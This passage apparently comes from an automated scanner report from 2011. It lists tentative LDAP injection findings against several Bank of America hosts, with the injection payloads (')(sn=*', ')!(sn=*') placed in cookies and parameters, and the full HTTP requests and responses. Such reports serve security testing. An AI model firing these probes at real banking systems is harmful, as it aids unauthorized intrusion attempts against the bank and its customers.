// This file is part of business e-finance suite (befs).
// It contains business specific info, and is different from the same named cefs file. -->

































































































   










   
   



   



   



   



   
   
   
   
   
   





   



   
























<span class="mainfontbold">Please Wait...</span>


<script language="JavaScript" type="text/javascript">
function setLocation() {
location.replace("/efs/servlet/military/DetectDemoMode");
}
window.onload=setLocation
</script>

</div>
<!-- END CONTENT AREA -->


<!-- minimum 70 pixels below content well -->
<div><img src="/efs/grafx/spacer.gif" alt="" width="1" height="70"></div>

<!-- blue rule with vertical spacing -->
<div style="margin-left: 12px;"><img src="/efs/grafx/rule-blue-735px.gif" alt="" width="735" height="1"></div>
<
...[SNIP]...

Request 2

GET /efs/servlet/military/login-wait.jsp HTTP/1.1
Host: militarybankonline.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000HPVCjNCdRvjHV0dGZx6wnu9:13393tt7e; TCID=*)!(sn=*; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:41:40 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 9030


<!-- login-wait.jsp -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/efs/servl
...[SNIP]...
<h1 class="pageTitle">Reset Password Wait</h1><a name="skipnav"></a></td>
       <td align="right" class="nav3" valign="top">
       </td>
       <td><img src="/efs/grafx/spacer.gif" width="10" height="1" border="0" alt=""></td>
   </tr>
   <tr>
       <td colspan="4"><img src="/efs/grafx/spacer.gif" alt="" width="1" height="4"></td>
   </tr>
   <tr>
       <td width="1%"><img src="/efs/grafx/spacer.gif" width="10" height="1" border="0" alt=" "></td>
       <td colspan="3" class="rule-blue1" ><img src="/efs/grafx/spacer.gif" alt="" width="1" height="1"></td>
   </tr>

</table>
<div><img src="/efs/grafx/spacer.gif" alt=" " width="1" height="40"></div>
<!-- end nav 3 -->


<!-- BEGIN CONTENT AREA -->
<div id="content" >
   
<!-- file: befs\html\v4\content\online\2000\login-wait.jsp
// This file is part of business e-finance suite (befs).
// It contains business specific info, and is different from the same named cefs file. -->


<!-- file: befs\html\v4\content\online\2000\login-wait.jsp
// This file is part of business e-finance suite (befs).
// It contains business specific info, and is different from the same named cefs file. -->

































































































   










   
   



   



   



   



   
   
   
   
   
   





   



   
























<span class="mainfontbold">Please Wait...</span>


<script language="JavaScript" type="text/javascript">
function setLocation() {
location.replace("/efs/servlet/military/DetectDemoMode");
}
window.onload=setLocation
</script>

</div>
<!-- END CONTENT AREA -->


<!-- minimum 70 pixels below content well -->
<div><img src="/efs/grafx/spacer.gif" alt="" width="1" height="70"></div>

<!-- blue rule with vertical spacing -->
<div style="margin-left: 12px;"><img src="/efs/grafx/rule-blue-735px.gif" alt="" width="735" height
...[SNIP]...

2.4. https://militarybankonline.bankofamerica.com/efs/servlet/military/login-wait.jsp [ngen_throttle cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://militarybankonline.bankofamerica.com
Path:   /efs/servlet/military/login-wait.jsp

Issue detail

The ngen_throttle cookie appears to be vulnerable to LDAP injection attacks.

The payloads 1619b63cb2b56805)(sn=* and 1619b63cb2b56805)!(sn=* were each submitted in the ngen_throttle cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /efs/servlet/military/login-wait.jsp HTTP/1.1
Host: militarybankonline.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000HPVCjNCdRvjHV0dGZx6wnu9:13393tt7e; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=1619b63cb2b56805)(sn=*; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:43:31 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 9030


<!-- login-wait.jsp -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/efs/servl
...[SNIP]...
<h1 class="pageTitle">Reset Password Wait</h1><a name="skipnav"></a></td>
       <td align="right" class="nav3" valign="top">
       </td>
       <td><img src="/efs/grafx/spacer.gif" width="10" height="1" border="0" alt=""></td>
   </tr>
   <tr>
       <td colspan="4"><img src="/efs/grafx/spacer.gif" alt="" width="1" height="4"></td>
   </tr>
   <tr>
       <td width="1%"><img src="/efs/grafx/spacer.gif" width="10" height="1" border="0" alt=" "></td>
       <td colspan="3" class="rule-blue1" ><img src="/efs/grafx/spacer.gif" alt="" width="1" height="1"></td>
   </tr>

</table>
<div><img src="/efs/grafx/spacer.gif" alt=" " width="1" height="40"></div>
<!-- end nav 3 -->


<!-- BEGIN CONTENT AREA -->
<div id="content" >
   
<!-- file: befs\html\v4\content\online\2000\login-wait.jsp
// This file is part of business e-finance suite (befs).
// It contains business specific info, and is different from the same named cefs file. -->


<!-- file: befs\html\v4\content\online\2000\login-wait.jsp
// This file is part of business e-finance suite (befs).
// It contains business specific info, and is different from the same named cefs file. -->

































































































   










   
   



   



   



   



   
   
   
   
   
   





   



   
























<span class="mainfontbold">Please Wait...</span>


<script language="JavaScript" type="text/javascript">
function setLocation() {
location.replace("/efs/servlet/military/DetectDemoMode");
}
window.onload=setLocation
</script>

</div>
<!-- END CONTENT AREA -->


<!-- minimum 70 pixels below content well -->
<div><img src="/efs/grafx/spacer.gif" alt="" width="1" height="70"></div>

<!-- blue rule with vertical spacing -->
<div style="margin-left: 12px;"><img src="/efs/grafx/rule-blue-735px.gif" alt="" width="735" height
...[SNIP]...

Request 2

GET /efs/servlet/military/login-wait.jsp HTTP/1.1
Host: militarybankonline.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000HPVCjNCdRvjHV0dGZx6wnu9:13393tt7e; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=1619b63cb2b56805)!(sn=*; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:43:31 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 9016


<!-- login-wait.jsp -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/efs/servl
...[SNIP]...
<h1 class="pageTitle">Sorry</h1><a name="skipnav"></a></td>
       <td align="right" class="nav3" valign="top">
       </td>
       <td><img src="/efs/grafx/spacer.gif" width="10" height="1" border="0" alt=""></td>
   </tr>
   <tr>
       <td colspan="4"><img src="/efs/grafx/spacer.gif" alt="" width="1" height="4"></td>
   </tr>
   <tr>
       <td width="1%"><img src="/efs/grafx/spacer.gif" width="10" height="1" border="0" alt=" "></td>
       <td colspan="3" class="rule-blue1" ><img src="/efs/grafx/spacer.gif" alt="" width="1" height="1"></td>
   </tr>

</table>
<div><img src="/efs/grafx/spacer.gif" alt=" " width="1" height="40"></div>
<!-- end nav 3 -->


<!-- BEGIN CONTENT AREA -->
<div id="content" >
   
<!-- file: befs\html\v4\content\online\2000\login-wait.jsp
// This file is part of business e-finance suite (befs).
// It contains business specific info, and is different from the same named cefs file. -->


<!-- file: befs\html\v4\content\online\2000\login-wait.jsp
// This file is part of business e-finance suite (befs).
// It contains business specific info, and is different from the same named cefs file. -->

































































































   










   
   



   



   



   



   
   
   
   
   
   





   



   
























<span class="mainfontbold">Please Wait...</span>


<script language="JavaScript" type="text/javascript">
function setLocation() {
location.replace("/efs/servlet/military/DetectDemoMode");
}
window.onload=setLocation
</script>

</div>
<!-- END CONTENT AREA -->


<!-- minimum 70 pixels below content well -->
<div><img src="/efs/grafx/spacer.gif" alt="" width="1" height="70"></div>

<!-- blue rule with vertical spacing -->
<div style="margin-left: 12px;"><img src="/efs/grafx/rule-blue-735px.gif" alt="" width="735" height="1"></div>
<
...[SNIP]...

2.5. http://sofa.bankofamerica.com/cm [cck parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sofa.bankofamerica.com
Path:   /cm

Issue detail

The cck parameter appears to be vulnerable to LDAP injection attacks.

The payloads 5af86ec746dc2d56)(sn=* and 5af86ec746dc2d56)!(sn=* were each submitted in the cck parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /cm?ci=90010394&st=1303820707087&vn1=4.2.7.1BOA&ec=utf-8&pi=homepage%3AContent%3APersonal%3Bhome_personal&rs=Y&ul=http%3A//www.bankofamerica.com&tid=8&ti=1303820743960&nm=signin_link_services&hr=javascript%3Avoid%280%29%3B&cvdone=p&cck=5af86ec746dc2d56)(sn=* HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/weblinking/?referredby=futurescholar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; throttle_value=35; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; CoreID6=30061303820763046772281; TestSess3=30061303820763046772281

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:54 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 5af86ec746dc2d56)(sn=*; path=/; expires=Sat, 25 Apr 2026 12:26:54 GMT
Set-Cookie: 90010394_login=1303820814016783873090010394; path=/
Set-Cookie: 90010394_reset=1303820814;path=/
Expires: Mon, 25 Apr 2011 18:26:54 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /cm?ci=90010394&st=1303820707087&vn1=4.2.7.1BOA&ec=utf-8&pi=homepage%3AContent%3APersonal%3Bhome_personal&rs=Y&ul=http%3A//www.bankofamerica.com&tid=8&ti=1303820743960&nm=signin_link_services&hr=javascript%3Avoid%280%29%3B&cvdone=p&cck=5af86ec746dc2d56)!(sn=* HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/weblinking/?referredby=futurescholar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; throttle_value=35; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; CoreID6=30061303820763046772281; TestSess3=30061303820763046772281

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:54 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 5af86ec746dc2d56)!(sn=*; path=/; expires=Sat, 25 Apr 2026 12:26:54 GMT
Set-Cookie: 90010394_login=1303820814018461594690010394; path=/
Set-Cookie: 90010394_reset=1303820814;path=/
Expires: Mon, 25 Apr 2011 18:26:54 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

2.6. http://sofa.bankofamerica.com/cm [ci parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sofa.bankofamerica.com
Path:   /cm

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads bcc72cbfd1bac411)(sn=* and bcc72cbfd1bac411)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /cm?ci=bcc72cbfd1bac411)(sn=*&st=1303820707087&vn1=4.2.7.1BOA&ec=utf-8&pi=homepage%3AContent%3APersonal%3Bhome_personal&rs=Y&ul=http%3A//www.bankofamerica.com&tid=8&ti=1303820743960&nm=signin_link_services&hr=javascript%3Avoid%280%29%3B&cvdone=p&cck= HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/weblinking/?referredby=futurescholar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; throttle_value=35; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; CoreID6=30061303820763046772281; TestSess3=30061303820763046772281

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:16 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: bcc72cbfd1bac411)(sn=*_login=13038207760016843786bcc72cbfd1bac411)(sn=*; path=/
Set-Cookie: bcc72cbfd1bac411)(sn=*_reset=1303820776;path=/
Expires: Mon, 25 Apr 2011 18:26:16 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /cm?ci=bcc72cbfd1bac411)!(sn=*&st=1303820707087&vn1=4.2.7.1BOA&ec=utf-8&pi=homepage%3AContent%3APersonal%3Bhome_personal&rs=Y&ul=http%3A//www.bankofamerica.com&tid=8&ti=1303820743960&nm=signin_link_services&hr=javascript%3Avoid%280%29%3B&cvdone=p&cck= HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.bankofamerica.com/weblinking/?referredby=futurescholar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; throttle_value=35; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; CoreID6=30061303820763046772281; TestSess3=30061303820763046772281

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:26:16 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: bcc72cbfd1bac411)!(sn=*_login=13038207760067175434bcc72cbfd1bac411)!(sn=*; path=/
Set-Cookie: bcc72cbfd1bac411)!(sn=*_reset=1303820776;path=/
Expires: Mon, 25 Apr 2011 18:26:16 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

2.7. http://sofa.bankofamerica.com/eluminate [ci parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sofa.bankofamerica.com
Path:   /eluminate

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 7fd121d0852e72ac)(sn=* and 7fd121d0852e72ac)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /eluminate?tid=6&ci=7fd121d0852e72ac)(sn=*&vn2=e4.0&st=1303820908565&vn1=4.2.7.1BOA&ec=utf-8&pi=WIM%3AApp%3AOAO%3BOAO%3AGlobal&cg=WIM%3AApp%3AOAO&rnd=1303827070107&pc=Y&jv=1.6&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&ul=http%3A//www.merrilledge.com/m/pages/global-oao.aspx HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.merrilledge.com/m/pages/global-oao.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; CoreID6=30061303820763046772281; TestSess3=30061303820763046772281; 90010394_login=1303820765016783873090010394; 90010394_reset=1303820765; throttle_value=35; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; NSC_CbolPgBnfsjdb=445b32097852

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:29:31 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 7fd121d0852e72ac)(sn=*_login=130382097101678387307fd121d0852e72ac)(sn=*; path=/
Set-Cookie: 7fd121d0852e72ac)(sn=*_reset=1303820971;path=/
Expires: Mon, 25 Apr 2011 18:29:31 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /eluminate?tid=6&ci=7fd121d0852e72ac)!(sn=*&vn2=e4.0&st=1303820908565&vn1=4.2.7.1BOA&ec=utf-8&pi=WIM%3AApp%3AOAO%3BOAO%3AGlobal&cg=WIM%3AApp%3AOAO&rnd=1303827070107&pc=Y&jv=1.6&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java%2528TM%2529%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&ul=http%3A//www.merrilledge.com/m/pages/global-oao.aspx HTTP/1.1
Host: sofa.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://www.merrilledge.com/m/pages/global-oao.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; cmTPSet=Y; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; state=MA; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; CoreID6=30061303820763046772281; TestSess3=30061303820763046772281; 90010394_login=1303820765016783873090010394; 90010394_reset=1303820765; throttle_value=35; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; NSC_CbolPgBnfsjdb=445b32097852

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:29:31 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 7fd121d0852e72ac)!(sn=*_login=130382097100168437867fd121d0852e72ac)!(sn=*; path=/
Set-Cookie: 7fd121d0852e72ac)!(sn=*_reset=1303820971;path=/
Expires: Mon, 25 Apr 2011 18:29:31 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

2.8. https://www.bankofamerica.com/Control.do [BIGipServerngen-www.80 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /Control.do

Issue detail

The BIGipServerngen-www.80 cookie appears to be vulnerable to LDAP injection attacks.

The payloads 4f1f2a3187adb27d)(sn=* and 4f1f2a3187adb27d)!(sn=* were each submitted in the BIGipServerngen-www.80 cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=4f1f2a3187adb27d)(sn=*; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:44:31 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000kDekljq8oj8aDBUBvjJHnMM:12rfue8je; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=363; Expires=Sun, 23 Oct 2011 12:44:30 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:44:30 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843













<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <
...[SNIP]...

Request 2

GET /Control.do?body=selectState&section=onlinebanking_enroll HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=4f1f2a3187adb27d)!(sn=*; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:44:31 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
